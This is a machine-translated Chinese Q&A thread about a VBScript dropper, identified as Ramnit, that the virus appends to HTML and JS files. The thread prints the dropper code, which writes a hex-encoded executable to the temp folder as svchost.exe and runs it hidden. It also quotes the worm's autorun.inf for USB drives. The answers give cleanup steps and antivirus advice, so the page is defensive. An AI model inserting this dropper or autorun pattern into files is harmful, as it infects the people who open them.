这段VB代码是如何自动添加的

How is this piece of VB code getting added automatically?

本文关键字：何自动添加 VB 代码这段更新时间：2023-09-26

每当我在Notepad++中打开JavaScript（.js）或HTML（.HTML）文件几天后，类似的VB脚本就会自动添加到最后。我强烈感觉这是某种病毒，有人能指导我吗？

</html> // My file ends here......
<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = "4D5A90000300000004000 ...... {lots of numbers}
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "'" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT><!-- ޼ .... {Lots of junk characters here } -->

它运行的文件是%temp%''svchost.exe.

因此，做一个任务列表

tasklist /svc /fi "imagename eq svchost.exe"

记下没有任何包含服务的svchosts。输入xxxx 的实际PID

taskkill /pid xxxx /pid xxxx /pid xxxx /f

这将停止特定部分的运行。

病毒使用的技术不会可靠地工作，尤其是在非英语窗口上。

此外，在清除可能存在的其他部分之前，更改安全性以防止执行，而不是删除它。

icacls "%temp%'svchost.exe" /deny Everyone:F

这适用于Vista，但广泛适用于所有版本。

病毒清洗

如果您在正常模式下执行这些操作时遇到问题。尝试在网络安全模式下进行此操作。

单击开始-所有程序-附件-运行并键入

msconfig

然后转到引导选项卡，单击安全引导，并勾选网络。重新启动。返回此处并取消选中"安全引导"以返回正常模式。

安全扫描仪

Microsoft安全扫描程序是一个免费下载的安全工具，提供按需扫描并帮助删除病毒、间谍软件和其他恶意软件。它可以与您现有的防病毒软件配合使用。

http://www.microsoft.com/security/scanner/en-au/default.aspx

恶意软件删除工具

如果你无法下载或运行安全扫描程序，Windows内置了一个小型防病毒程序。它只针对最常见的威胁。它将要更新，不要让它更新。运行它而不更新。然后再次运行它，这次更新它。

单击开始-所有程序-附件-运行（或按Winkey+R）。类型

mrt

重置防火墙

您可以将防火墙重置为默认设置。

开始-所有程序-附件-右键单击命令提示符，然后选择以管理员身份运行。键入（或通过在"命令提示"窗口中右键单击并选择"粘贴"来复制和粘贴）。

netsh advfirewall reset export "%userprofile%'desktop'Firewall Settings.wfw"

安全修复

修复程序是对Microsoft的程序进行故障排除。其中有27个。

自动修复Windows安全设置以确保您的电脑的安全

http://support.microsoft.com/mats/Malware_Prevention/en-us

和

修复安全问题以自动保护和保护Windows

http://support.microsoft.com/mats/windows_security_diagnostic/en-us

和

修复Internet Explorer问题，使IE快速、安全、稳定地进行

http://support.microsoft.com/mats/ie_performance_and_safety/en-us

完整列表请访问

http://support.microsoft.com/fixit/en-us

当您选择下载它时，请选择在另一台计算机上运行的选项。然后你可以把它保存到硬盘上的一个文件夹里。打开文件夹，打开文件夹FixitPortable，然后运行LaunchFixIt。它将包含所有27个Fixit。

全职防病毒

对于永久性的防病毒，我们在论坛上注意到，使用Microsoft Security Essentials的人完全没有问题。

http://www.microsoft.com/en-au/download/details.aspx?id=5201

如果其他全部失败

这个来自微软的程序引导另一个基本操作系统来清理Windows。你需要把它放在USB或DVD上，然后从它启动。

http://windows.microsoft.com/en-US/windows/what-is-windows-defender-offline

查找有关威胁的详细信息

微软有一个病毒信息百科全书。

http://www.microsoft.com/security/portal/threat/threats.aspx

我还认为您的系统受到了一些病毒的影响。我想分享一个我遇到的与你的问题相匹配的链接，请浏览，我会在这里发布链接-->http://www.webdeveloper.com/forum/showthread.php?287131-VBScript自动插入HTML页面

我认为这是一种病毒。

所以，如果你没有防病毒软件，你需要安装。

我推荐免费的：Microsoft Security Essentials或Avast。

此外，您可以下载专门的防病毒实用程序，只用于扫描，而不是安装它-Dr.Web CureIt！

然后对你的电脑进行全面扫描。

您应该检查所有启动命令并删除所有恶意命令。例如CCleaner Free可以帮助您检查它们。

UPD清理并删除启动命令后，可以使用sfc实用程序。

Microsoft Windows资源检查器

扫描所有受保护系统文件的完整性，并用正确的Microsoft版本替换不正确的版本。

使用管理员权限运行cmd，然后运行sfc /scannow命令。

这是一种名为Win32.Ramnit的病毒阅读此处的描述：

https://www.virustotal.com/#/file/fd6c69c345f1e32924f0a5bb7393e191b393a78d58e2c6413b03ced7482f2320/detection

我刚刚在我客户的一台电脑上发现了这种病毒，这种病毒修改了我USB便携式硬盘中的所有html文件。

这个脚本执行VBScript来创建一个文件并执行它，并在这个文件夹中安装一个程序：

C:'Program Files'Microsoft'DesktopLayer.exe

阅读更多：http://greatis.com/blog/how-to-remove-malware/desktoplayer-exe-virus-ramnit.htm

对于你插入这台受感染的电脑的每一个U盘，病毒都会创建2个文件：

autorun.inf
'RECYCLER'<random GUID>'<random charx8>.exe

autorun.inf:的内容

[autorun]
action=Open
icon=%WinDir%'system32'shell32.dll,4
shellexecute=.'RECYCLER'S-0-8-75-3728445372-7281148451-227621134-4236'ZDqdQKMm.exe
shell'explore'command=.'RECYCLER'S-0-8-75-3728445372-7281148451-227621134-4236'ZDqdQKMm.exe
USEAUTOPLAY=1
shell'Open'command=.'RECYCLER'S-0-8-75-3728445372-7281148451-227621134-4236'ZDqdQKMm.exe

当这个pendrive被插入另一台计算机时，它试图执行病毒安装程序。